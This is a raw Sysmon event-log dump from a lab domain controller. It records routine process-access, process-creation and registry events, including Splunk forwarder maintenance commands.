13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.658{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18226|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.671{59A5CD1D-8E5A-6005-5100-00000000A301}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
10341000x80000000000000001984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.626{59A5CD1D-8E5A-6005-5000-00000000A301}33683364C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:18.580{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0x9f370858) 10341000x80000000000000001982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E5A-6005-4F00-00000000A301}34563480C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.384{59A5CD1D-8E5A-6005-5000-00000000A301}3368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4F00-00000000A301}3456C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:18.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 